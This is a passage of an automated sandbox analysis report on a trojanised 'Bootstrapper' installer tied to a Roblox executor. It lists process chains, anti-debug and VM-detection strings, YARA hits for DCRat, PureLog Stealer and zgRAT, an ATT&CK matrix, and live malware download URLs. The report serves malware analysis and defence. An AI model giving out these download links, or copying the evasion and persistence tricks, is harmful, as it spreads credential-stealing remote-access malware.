Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.17.dr	Binary or memory string: VMware, Inc.
Source: Bootstrapper.exe, 00000001.00000002.1903197982.00000163876C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.17.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.17.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Bootstrapper.exe, 00000001.00000002.1905751482.00000163A1B61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.17.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Bootstrapper.exe, 00000003.00000003.1825688169.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+
Source: Amcache.hve.17.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.17.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: wmnXYZRZEK.exe0.22.dr	Binary or memory string: Q3vLU4gw5svZvmCIyFLS
Source: Amcache.hve.17.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Bootstrapper.exe, 00000001.00000002.1903197982.00000163876C4000.00000004.00000020.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000008.00000002.2155075339.000001907BC62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.17.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Bootstrapper.exe, 00000003.00000003.1825688169.0000000002FD2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.17.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.17.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1
Source: Bootstrapper.exe, 00000001.00000002.1905751482.00000163A1B61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}83V
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.17.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.17.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.17.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

API call chain: ExitProcess graph end node

graph_3-25021

Source: C:\Users\user\Desktop\BootstrapperV1.23.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00E1F838

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E27DEE mov eax, dword ptr fs:[00000030h]

3_2_00E27DEE

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E2C030 GetProcessHeap,

3_2_00E2C030

Source: C:\Users\user\Desktop\Bootstrapper.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe	Process token adjusted: Debug
Source: C:\monitordll\componentreviewsavesSession.exe	Process token adjusted: Debug
Source: C:\monitordll\componentreviewsavesSession.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E1F838
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1F9D5 SetUnhandledExceptionFilter,	3_2_00E1F9D5
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E1FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00E1FBCA
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 3_2_00E28EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00E28EBD

Source: C:\Users\user\Desktop\Bootstrapper.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: BootstrapperV1.23.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: \Device\ConDrv, type: DROPPED

Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\Desktop\Bootstrapper.exe "C:\Users\user\Desktop\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KKjubdmzCR.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Process created: C:\Users\user\Desktop\BootstrapperV1.23.exe "C:\Users\user\Desktop\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\user\Desktop\Bootstrapper.exe" --isUpdate true	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\monitordll\bgx0Ow.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\monitordll\componentreviewsavesSession.exe "C:\monitordll/componentreviewsavesSession.exe"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\giumm02q\giumm02q.cmdline"
Source: C:\monitordll\componentreviewsavesSession.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC1DD.tmp" "c:\Windows\System32\CSC7999042AC4784EED922BD982607A7FA2.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E1F654 cpuid

3_2_00E1F654

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

3_2_00E1AF0F

Source: C:\Users\user\Desktop\Bootstrapper.exe	Queries volume information: C:\Users\user\Desktop\Bootstrapper.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bootstrapper.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Queries volume information: C:\Users\user\Desktop\BootstrapperV1.23.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BootstrapperV1.23.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\monitordll\componentreviewsavesSession.exe	Queries volume information: C:\monitordll\componentreviewsavesSession.exe VolumeInformation
Source: C:\monitordll\componentreviewsavesSession.exe	Queries volume information: C:\monitordll\componentreviewsavesSession.exe VolumeInformation
Source: C:\monitordll\componentreviewsavesSession.exe	Queries volume information: C:\monitordll\componentreviewsavesSession.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E1DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

3_2_00E1DF1E

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Code function: 3_2_00E0B146 GetVersionExW,

3_2_00E0B146

Source: C:\Users\user\Desktop\Bootstrapper.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.17.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000016.00000002.2137209000.0000000012401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: componentreviewsavesSession.exe PID: 1004, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.componentreviewsavesSession.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2090696607.0000000000052000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1817989346.00000000071B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, type: DROPPED
Source: Yara match	File source: C:\monitordll\componentreviewsavesSession.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.componentreviewsavesSession.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, type: DROPPED
Source: Yara match	File source: C:\monitordll\componentreviewsavesSession.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000016.00000002.2137209000.0000000012401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: componentreviewsavesSession.exe PID: 1004, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.componentreviewsavesSession.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2090696607.0000000000052000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1817989346.00000000071B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, type: DROPPED
Source: Yara match	File source: C:\monitordll\componentreviewsavesSession.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 3.3.Bootstrapper.exe.72026e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.componentreviewsavesSession.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.Bootstrapper.exe.68fb6e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4c97cb.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.517e92.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.4017cb.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KKjubdmzCR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe, type: DROPPED
Source: Yara match	File source: C:\monitordll\componentreviewsavesSession.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	21 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	32 Masquerading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KKjubdmzCR.exe	82%	ReversingLabs	Win32.Trojan.ExNuma
KKjubdmzCR.exe	67%	Virustotal		Browse
KKjubdmzCR.exe	100%	Avira	HEUR/AGEN.1343594
KKjubdmzCR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	100%	Avira	TR/AVI.Agent.iqkvn
C:\monitordll\2mpoFrNBWk.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\R1OpfLIrNP.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Avira	HEUR/AGEN.1323342
C:\monitordll\componentreviewsavesSession.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	100%	Joe Sandbox ML
C:\Windows\System32\SecurityHealthSystray.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\BootstrapperV1.23.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Joe Sandbox ML
C:\monitordll\componentreviewsavesSession.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Mozilla Maintenance Service\logs\wmnXYZRZEK.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Defender\en-GB\RuntimeBroker.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\SIHClient.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\WindowsHolographicDevices\SpatialStore\wmnXYZRZEK.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\wmnXYZRZEK.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	61%	ReversingLabs	Win32.Trojan.Uztuby
C:\Users\user\Desktop\Bootstrapper.exe	63%	ReversingLabs	Win64.Trojan.Malgent
C:\Users\user\Desktop\BootstrapperV1.23.exe	29%	ReversingLabs	ByteCode-MSIL.Trojan.Heracles
C:\Users\user\Desktop\ufQLssLX.log	24%	ReversingLabs
C:\monitordll\componentreviewsavesSession.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
4d38a1ec.solaraweb-alj.pages.dev	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:64632R	0%	Avira URL Cloud	safe
https://4d38a1ec.solaraweb-alj.pages.dev	100%	Avira URL Cloud	malware
http://4d38a1ec.solaraweb-alj.pages.dev	100%	Avira URL Cloud	malware
https://discord.com;http://127.0.0.1:6463/rpc?v=11	0%	Avira URL Cloud	safe
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	100%	Avira URL Cloud	malware
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip	100%	Avira URL Cloud	malware
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	7%	Virustotal		Browse
http://4d38a1ec.solaraweb-alj.pages.dev	7%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nodejs.org	104.20.23.46	true	false		high
getsolara.dev	104.21.93.27	true	false		high
4d38a1ec.solaraweb-alj.pages.dev	172.66.44.59	true	false	7%, Virustotal, Browse	unknown
edge-term4-fra2.roblox.com	128.116.123.3	true	false		high
www.nodejs.org	104.20.23.46	true	false		high
clientsettings.roblox.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://getsolara.dev/asset/discord.json	false		high
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live	false		high
https://getsolara.dev/api/endpoint.json	false		high
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:6463	Bootstrapper.exe, 00000001.00000002.1903748427.000001638938E000.00000004.00000800.00020000.00000000.sdmp	false		high
